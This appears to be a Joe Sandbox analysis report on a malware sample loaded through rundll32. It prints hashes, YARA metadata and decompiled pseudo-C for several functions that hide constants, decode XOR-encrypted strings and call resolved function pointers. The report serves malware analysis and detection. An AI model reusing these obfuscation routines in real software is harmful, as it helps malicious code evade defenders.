Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: 4.$gG
API String ID: 2962429428-791606841
Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction ID: b0accf93a4af97bc89208f05766d53b340cebecc9f01cdb70415f4d7b11e316a
Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction Fuzzy Hash: D261AB711087419BD7A8CF24C88985FBBE0FBC4318F600E5DF58A962A0D7798A49CB87

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B112, Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B2B112() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				char* _t91;
				void* _t94;
				intOrPtr _t97;
				signed int _t109;
				signed int _t110;
				short* _t113;

				_v524 = _v524 & 0x00000000;
				_v536 = 0x15a9e0;
				_t94 = 0x2447ce85;
				_v532 = 0xcaf76;
				_v528 = 0x42cbc4;
				_v544 = 0x1d8c;
				_v544 = _v544 << 8;
				_v544 = _v544 ^ 0x001dbb75;
				_v564 = 0xb98d;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 | 0xb6682b1a;
				_t109 = 0x16;
				_v564 = _v564 / _t109;
				_v564 = _v564 ^ 0x084aef85;
				_v568 = 0xa53e;
				_v568 = _v568 | 0x3e6d869d;
				_t110 = 0x46;
				_v568 = _v568 * 0x2b;
				_v568 = _v568 ^ 0x7c6b3e02;
				_v540 = 0x49b5;
				_v540 = _v540 + 0xbc03;
				_v540 = _v540 ^ 0x0001452b;
				_v556 = 0x9474;
				_v556 = _v556 << 0xb;
				_v556 = _v556 ^ 0xd8ad9d33;
				_v556 = _v556 ^ 0xdc0e2a5f;
				_v560 = 0x11f0;
				_v560 = _v560 + 0xffffe240;
				_v560 = _v560 + 0xb761;
				_v560 = _v560 ^ 0x000087cb;
				_v548 = 0x2457;
				_v548 = _v548 / _t110;
				_v548 = _v548 ^ 0x000075df;
				do {
					while(_t94 != 0x14e9f4e4) {
						if(_t94 == 0x21e9d2a8) {
							_t97 =  *0xb3ca2c; // 0x505cc8
							_t82 = _t97 + 0x230; // 0x6c0053
							return E00B26636(_t82, _v556, _v560, _v548, _t113);
						}
						if(_t94 == 0x2275b3e1) {
							_t91 = E00B33E3F(_t94,  &_v520, __eflags, _v544, _v564);
							_t94 = 0x14e9f4e4;
							continue;
						}
						if(_t94 != 0x2447ce85) {
							goto L15;
						}
						_t94 = 0x2275b3e1;
					}
					_v552 = 0xe342;
					_v552 = _v552 ^ 0x7b193e87;
					_v552 = _v552 ^ 0x7b19ddc7;
					_t113 =  &_v520 + E00B30ADC( &_v520, _v568, _v540) * 2;
					while(1) {
						_t91 =  &_v520;
						__eflags = _t113 - _t91;
						if(_t113 <= _t91) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t76 =  &_v552;
						 *_t76 = _v552 - 1;
						__eflags =  *_t76;
						if( *_t76 == 0) {
							__eflags = _t113;
							L14:
							_t94 = 0x21e9d2a8;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t94 - 0x318d27d3;
				} while (__eflags != 0);
				return _t91;
			}

0x00b2b118
0x00b2b11f
0x00b2b127
0x00b2b12c
0x00b2b134
0x00b2b13c
0x00b2b144
0x00b2b149
0x00b2b151
0x00b2b162
0x00b2b16b
0x00b2b183
0x00b2b188
0x00b2b18e
0x00b2b196
0x00b2b19e
0x00b2b1b3
0x00b2b1b4
0x00b2b1b8
0x00b2b1c0
0x00b2b1c8
0x00b2b1d0
0x00b2b1d8
0x00b2b1e0
0x00b2b1e5
0x00b2b1ed
0x00b2b1f5
0x00b2b1fd
0x00b2b205
0x00b2b20d
0x00b2b215
0x00b2b223
0x00b2b227
0x00b2b233
0x00b2b233
0x00b2b239
0x00b2b2ce
0x00b2b2d8
0x00000000
0x00b2b2e3
0x00b2b241
0x00b2b25b
0x00b2b262
0x00000000
0x00b2b262
0x00b2b249
0x00000000
0x00000000
0x00b2b24b
0x00b2b24b
0x00b2b266
0x00b2b272
0x00b2b27a
0x00b2b294
0x00b2b2a8
0x00b2b2a8
0x00b2b2ac
0x00b2b2ae
0x00000000
0x00000000
0x00b2b299
0x00b2b29d
0x00b2b2a5
0x00b2b2a5
0x00b2b2a5
0x00000000
0x00b2b2a5
0x00b2b29f
0x00b2b29f
0x00b2b29f
0x00b2b2a3
0x00b2b2b2
0x00b2b2b5
0x00b2b2b5
0x00000000
0x00b2b2b5
0x00000000
0x00b2b2a3
0x00000000
0x00b2b2b7
0x00b2b2b7
0x00b2b2b7
0x00000000

Strings

B, xrefs: 00B2B266
W$, xrefs: 00B2B215

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: B$W$
API String ID: 0-584637061
Opcode ID: c7e9fff02f098b76ee47ef2da31e902607cdb0fc7e5eaf197bd2a4a57a6adb1a
Instruction ID: 70574bfc73e4c1f2122a132a865a2e829429d4e2b88d2454ff2295a3fb17a0e7
Opcode Fuzzy Hash: c7e9fff02f098b76ee47ef2da31e902607cdb0fc7e5eaf197bd2a4a57a6adb1a
Instruction Fuzzy Hash: 58417772508351CBD714CF20E58995FBFE1FBC8758F204A5EF089661A1DB749A4ACB83

Uniqueness

Uniqueness Score: -1.00%

Function 00B331E2, Relevance: 2.6, Strings: 2, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B331E2(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v572;
				intOrPtr* _t106;
				signed int _t110;
				signed int _t111;

				_v52 = 0;
				_v28 = 0x38ff;
				_v28 = _v28 | 0x657975a1;
				_v28 = _v28 ^ 0x65795a60;
				_v36 = 0xb7c2;
				_t110 = 0x62;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x0000110e;
				_v24 = 0xe00a;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffffb393;
				_v24 = _v24 ^ 0x001b9d0d;
				_v20 = 0xfb31;
				_v20 = _v20 + 0xbdbd;
				_v20 = _v20 + 0x1446;
				_v20 = _v20 ^ 0x0001be9a;
				_v40 = 0x7fef;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x00001ed5;
				_v8 = 0xf1c1;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0x6d97;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xf29c2a73;
				_v32 = 0xb6f2;
				_v32 = _v32 | 0x667f3c4f;
				_v32 = _v32 ^ 0x667f909f;
				_v16 = 0xa641;
				_t111 = 0x3c;
				_v16 = _v16 / _t111;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x1e480640;
				_v16 = _v16 ^ 0x1e480386;
				_v44 = 0xa73d;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x000057d1;
				_v48 = 0x6a4b;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x00354ae8;
				_v12 = 0x27be;
				_v12 = _v12 ^ 0xc55dd82d;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xb51d94d3;
				_v12 = _v12 ^ 0x844acffa;
				_t112 = _v28;
				if(E00B21210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
					_t106 =  &_v572;
					if(_v572 != 0) {
						while( *_t106 != 0x5c) {
							_t106 = _t106 + 2;
							if( *_t106 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t106 + 2)) = 0;
					}
					L6:
					E00B3375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
				}
				return _v52;
			}

0x00b331f0
0x00b331f3
0x00b331fa
0x00b33201
0x00b33208
0x00b33214
0x00b33219
0x00b3321e
0x00b33225
0x00b3322c
0x00b33230
0x00b33237
0x00b3323e
0x00b33245
0x00b3324c
0x00b33253
0x00b3325a
0x00b33261
0x00b33264
0x00b3326b
0x00b33272
0x00b33276
0x00b3327d
0x00b33281
0x00b33288
0x00b3328f
0x00b33296
0x00b3329d
0x00b332a7
0x00b332aa
0x00b332b3
0x00b332b7
0x00b332be
0x00b332c5
0x00b332cc
0x00b332d0
0x00b332d7
0x00b332de
0x00b332e2
0x00b332e9
0x00b332f0
0x00b332f7
0x00b332fb
0x00b33302
0x00b33314
0x00b33321
0x00b33323
0x00b33330
0x00b33332
0x00b33338
0x00b3333e
0x00000000
0x00000000
0x00b33340
0x00000000
0x00b3333e
0x00b33342
0x00b33344
0x00b33344
0x00b33348
0x00b3336d
0x00b33372
0x00b3337c

Strings

J5, xrefs: 00B332E2
`Zye, xrefs: 00B33201

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: `Zye$J5
API String ID: 0-1569392922
Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction ID: 1d50075eb271f4651a27723210bc6bd0d22f261ba58ba978a7abb4dfdd8370b7
Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction Fuzzy Hash: 2F4105B1C0021DEBDF59CFA0C94A9EEBBB5FB14704F208199E111B62A0D7B94B54CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B3889D, Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00B3889D(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t50;
				signed int _t57;
				signed int _t74;
				signed int _t75;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				signed int _t93;
				signed int _t94;
				signed int* _t95;
				signed int* _t96;
				signed int _t97;
				signed int _t98;
				unsigned int _t100;
				void* _t106;
				short _t107;
				void* _t108;
				void* _t109;

				_push( *((intOrPtr*)(_t108 + 0x30)));
				_push(__ecx);
				E00B2602B(_t50);
				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
				_t95 =  &(__ecx[1]);
				_t107 = 0;
				 *((intOrPtr*)(_t108 + 0x34)) = 0;
				 *(_t108 + 0x24) = 0xc5f8;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
				 *(_t108 + 0x1c) = 0x21c8;
				_t97 = 0x48;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
				 *(_t108 + 0x20) = 0xf93e;
				_t98 = 0xe;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
				_t93 =  *__ecx;
				_t96 =  &(_t95[1]);
				_t57 =  *_t95 ^ _t93;
				 *(_t108 + 0x28) = _t93;
				 *(_t108 + 0x2c) = _t57;
				_t32 = _t57 + 1; // 0xf93f
				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
				_t109 = _t108 + 4;
				_t74 = E00B28736(_t100 + _t100);
				 *(_t109 + 0x20) = _t74;
				if(_t74 != 0) {
					_t94 = _t74;
					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
					if(_t106 != 0) {
						_t75 =  *(_t109 + 0x1c);
						do {
							_t84 =  *_t96;
							_t96 =  &(_t96[1]);
							_t85 = _t84 ^ _t75;
							 *_t94 = _t85 & 0x000000ff;
							_t94 = _t94 + 8;
							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t106);
						_t74 =  *(_t109 + 0x18);
					}
					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
				}
				return _t74;
			}

0x00b388a4
0x00b388a9
0x00b388aa
0x00b388af
0x00b388b7
0x00b388ba
0x00b388be
0x00b388c2
0x00b388ca
0x00b388d2
0x00b388da
0x00b388e8
0x00b388ed
0x00b388f1
0x00b388f9
0x00b38901
0x00b3890f
0x00b38912
0x00b38916
0x00b3891e
0x00b38922
0x00b38925
0x00b38927
0x00b3892b
0x00b3892f
0x00b3893f
0x00b3894a
0x00b38959
0x00b3895b
0x00b38963
0x00b3896a
0x00b3897b
0x00b38980
0x00b38982
0x00b38986
0x00b38986
0x00b38988
0x00b3898b
0x00b38990
0x00b38998
0x00b3899e
0x00b389a2
0x00b389ab
0x00b389ac
0x00b389b3
0x00b389b7
0x00b389bb
0x00b389bb
0x00b389c5
0x00b389c5
0x00b389d2

Strings

Q`, xrefs: 00B388CA
{K, xrefs: 00B38916

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Q`${K
API String ID: 0-3942002812
Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction ID: 4ee7dfb21139191ebedd172ff2439ee8046ebd6bfac98b84ff8259714ff9983a
Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction Fuzzy Hash: 03318B72A087118FD314DF29C48456BF7E0FF88318F454B6DF589A7250DB74E90A8B96

Uniqueness

Uniqueness Score: -1.00%

Function 00B3878F, Relevance: 2.6, Strings: 2, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00B3878F(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t40;
				signed int _t42;
				unsigned int* _t55;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int* _t70;
				signed int* _t71;
				signed int* _t72;
				unsigned int _t74;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;

				_push( *((intOrPtr*)(_t84 + 0x18)));
				_push( *(_t84 + 0x24));
				_push(__ecx);
				_t40 = E00B2602B( *((intOrPtr*)(_t84 + 0x18)));
				 *(_t84 + 0x34) = 0x2399;
				_t4 =  &(_t40[1]); // 0x4
				_t71 = _t4;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
				 *(_t84 + 0x20) = 0xf668;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
				 *(_t84 + 0x1c) = 0x6aea;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
				_t58 =  *_t40;
				_t72 =  &(_t71[1]);
				_t42 =  *_t71 ^ _t58;
				 *(_t84 + 0x24) = _t58;
				 *(_t84 + 0x28) = _t42;
				_t23 = _t42 + 1; // 0x1
				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
				_t85 = _t84 + 8;
				_t55 = E00B28736(_t74);
				 *(_t85 + 0x2c) = _t55;
				if(_t55 != 0) {
					_t82 = 0;
					_t70 = _t55;
					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
					if(_t80 != 0) {
						_t56 =  *(_t85 + 0x18);
						do {
							_t65 =  *_t72;
							_t72 =  &(_t72[1]);
							_t66 = _t65 ^ _t56;
							 *_t70 = _t66;
							_t70 =  &(_t70[1]);
							_t67 = _t66 >> 0x10;
							 *((char*)(_t70 - 3)) = _t66 >> 8;
							 *(_t70 - 2) = _t67;
							_t82 = _t82 + 1;
							 *((char*)(_t70 - 1)) = _t67 >> 8;
						} while (_t82 < _t80);
						_t55 =  *(_t85 + 0x28);
					}
					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
				}
				return _t55;
			}

0x00b38799
0x00b3879a
0x00b3879f
0x00b387a0
0x00b387a5
0x00b387ad
0x00b387ad
0x00b387b0
0x00b387b8
0x00b387c0
0x00b387c8
0x00b387d0
0x00b387d8
0x00b387e0
0x00b387e8
0x00b387f0
0x00b387f8
0x00b387fc
0x00b387ff
0x00b38801
0x00b38805
0x00b38809
0x00b38819
0x00b38824
0x00b38832
0x00b38834
0x00b3883c
0x00b38844
0x00b38846
0x00b38857
0x00b3885c
0x00b3885e
0x00b38862
0x00b38862
0x00b38864
0x00b38867
0x00b38869
0x00b38870
0x00b38873
0x00b38876
0x00b38879
0x00b3887f
0x00b38880
0x00b38883
0x00b38887
0x00b38887
0x00b38890
0x00b38890
0x00b3889c

Strings

5Ur, xrefs: 00B387D8
j, xrefs: 00B387E0

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5Ur$j
API String ID: 0-2435424154
Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction ID: 0d7412abf3cd0c008ac6365d27e5e10b328848125040d6e2a91d6a1051d5bed1
Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction Fuzzy Hash: C6318C72A093118FD314CF29C88145BFBE0EF98714F454B5DF989A7251D734E90ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B39586, Relevance: 2.6, Strings: 2, Instructions: 79
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00B39586(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr _t95;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x5b9444;
				_v12 = 0xdcba;
				_v12 = _v12 >> 4;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0x949;
				_v12 = _v12 ^ 0x00001af4;
				_v8 = 0x3cb;
				_v8 = _v8 + 0xffff192d;
				_v8 = _v8 + 0x1519;
				_v8 = _v8 ^ 0xffff4a83;
				_v20 = 0x60da;
				_v20 = _v20 >> 4;
				_t95 = _a4;
				_v20 = _v20 * 0x71;
				_v20 = _v20 ^ 0x0002f52e;
				_v24 = 0x45f5;
				_v24 = _v24 ^ 0x8ddfc3a3;
				_v24 = _v24 | 0x63507c9c;
				_v24 = _v24 ^ 0xefdfb5dc;
				_v32 = 0xfa49;
				_v32 = _v32 ^ 0xb8265659;
				_v32 = _v32 ^ 0xb826ab18;
				_v28 = 0xa34;
				_v28 = _v28 | 0x478cb459;
				_v28 = _v28 ^ 0x0d1ea304;
				_v28 = _v28 ^ 0x4a9200da;
				_v36 = 0x43f7;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00001d3e;
				_v16 = 0x9c5f;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x65dacbc4;
				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
				_t98 = _t78;
				if(_t78 != 0) {
					_push(0xb3c860);
					_push(_v20);
					_t80 = E00B3878F(_v12, _v8, _t98);
					_push(_v32);
					_t93 = _t80;
					_push(_v24);
					_t81 = E00B36965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
					if(_t81 != 0) {
						 *_t81();
					}
					E00B32025(_v28, _t93, _v36, _v16);
				}
				return 0;
			}

0x00b3958c
0x00b39590
0x00b39597
0x00b3959e
0x00b395a2
0x00b395a6
0x00b395ad
0x00b395b4
0x00b395bb
0x00b395c2
0x00b395cf
0x00b395d6
0x00b395dd
0x00b395e6
0x00b395ed
0x00b395f0
0x00b395f7
0x00b395fe
0x00b39605
0x00b3960c
0x00b39613
0x00b3961a
0x00b39621
0x00b39628
0x00b3962f
0x00b39636
0x00b3963d
0x00b39644
0x00b3964b
0x00b3964f
0x00b39656
0x00b39661
0x00b39668
0x00b3966b
0x00b3966f
0x00b39679
0x00b3967c
0x00b3967e
0x00b39681
0x00b39686
0x00b3968f
0x00b39694
0x00b39697
0x00b39699
0x00b396a1
0x00b396ab
0x00b396ad
0x00b396ad
0x00b396ba
0x00b396c1
0x00b396c8

Strings

I, xrefs: 00B395A6
4, xrefs: 00B39628

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4$I
API String ID: 0-2585635819
Opcode ID: 7cb9cf6819534c17bae3d1f74d8ab54e50da2c8a22f7a6b2266427a368a9d1c8
Instruction ID: 0ead96e472bbb534d7e3fb9a8f1df39e30ee035abb2e2959cb7c72de5fde5e41
Opcode Fuzzy Hash: 7cb9cf6819534c17bae3d1f74d8ab54e50da2c8a22f7a6b2266427a368a9d1c8
Instruction Fuzzy Hash: 96411471D00309ABEF05CFA1C94A6EEBBB1FB44314F208199D411B6290D3B99B55CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00B27998, Relevance: 2.6, Strings: 2, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00B27998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t74;
				intOrPtr _t83;
				signed int _t85;
				signed int _t86;
				signed int _t96;
				intOrPtr* _t97;

				_t97 = _a4;
				_push(_a12);
				_t96 = _a8;
				_push(_t96);
				_push(_t97);
				E00B2602B(_t74);
				_v24 = 0x43bd;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00002257;
				_v20 = 0xfb35;
				_v20 = _v20 ^ 0x316dcd7c;
				_v20 = _v20 ^ 0x316d5b09;
				_v8 = 0x86ca;
				_t85 = 0x26;
				_v8 = _v8 / _t85;
				_v8 = _v8 + 0xffffb56c;
				_v8 = _v8 ^ 0xffffa5a2;
				_a4 = 0x6ea8;
				_a4 = _a4 | 0xeb58ef4a;
				_a4 = _a4 << 6;
				_t86 = 0x7d;
				_a4 = _a4 / _t86;
				_a4 = _a4 ^ 0x01b6ec6f;
				_v16 = 0xf7ce;
				_v16 = _v16 + 0xffffb713;
				_v16 = _v16 + 0xe2af;
				_v16 = _v16 ^ 0x0001a1e1;
				_v12 = 0x7f90;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x9419cfce;
				_v12 = _v12 ^ 0x9419fbb9;
				_a8 = 0xab6f;
				_a8 = _a8 * 0x2a;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 | 0x38dd753e;
				_a8 = _a8 ^ 0x38dd1846;
				E00B3360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
				E00B32674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
				_t83 =  *((intOrPtr*)(_t97 + 4));
				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
				return _t83;
			}

0x00b2799f
0x00b279a3
0x00b279a6
0x00b279a9
0x00b279aa
0x00b279ad
0x00b279b2
0x00b279bb
0x00b279bf
0x00b279c6
0x00b279cd
0x00b279d4
0x00b279db
0x00b279e7
0x00b279ec
0x00b279f1
0x00b279f8
0x00b279ff
0x00b27a06
0x00b27a0d
0x00b27a14
0x00b27a19
0x00b27a1c
0x00b27a23
0x00b27a2a
0x00b27a31
0x00b27a38
0x00b27a3f
0x00b27a46
0x00b27a4a
0x00b27a51
0x00b27a58
0x00b27a63
0x00b27a66
0x00b27a6a
0x00b27a71
0x00b27a84
0x00b27a9d
0x00b27aa2
0x00b27aa8
0x00b27ab0

Strings

[m1, xrefs: 00B279D4
JX, xrefs: 00B27A06

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: [m1$JX
API String ID: 0-848362422
Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction ID: 05759a483c4dc1efe2b73da597ee2ee08c526dec8e49383fd0f28f093ae8dc05
Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction Fuzzy Hash: 1B310475900209FFCF59CFA5D94A89EBBB1FF44714F20C099E9196A260D3799B24DF80

Uniqueness

Uniqueness Score: -1.00%

Function 10026EEF, Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba5f4fef64a2a0254c0e2d52ebc4027b74ccb20cd9da2ecdff77ae422ca7c1f
Instruction ID: 7718cd081baec369e951183fa318f74b584f3e7eaaeff7445ad8ed67a46fe496
Opcode Fuzzy Hash: 2ba5f4fef64a2a0254c0e2d52ebc4027b74ccb20cd9da2ecdff77ae422ca7c1f
Instruction Fuzzy Hash: 9A51E77580421DAFDB14DF69DC89AEABBB9EF49340F5442ADE40DD3201EA31AE448F50

Uniqueness

Uniqueness Score: -1.00%

Function 10003D00, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 10003D16

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: c43333caa387d92bf18048ba5194c8073359392a991d6a6e79863921c46a439b
Instruction ID: b950e272da6c6d4a4527cd0b7b5718a2ebac624053fb838113977bb8174c9be0
Opcode Fuzzy Hash: c43333caa387d92bf18048ba5194c8073359392a991d6a6e79863921c46a439b
Instruction Fuzzy Hash: DE5158B1A10216CBEB06CF55DAC17AEBBF8FB48390F10C52AD805EB295D7B49901CF64

Uniqueness

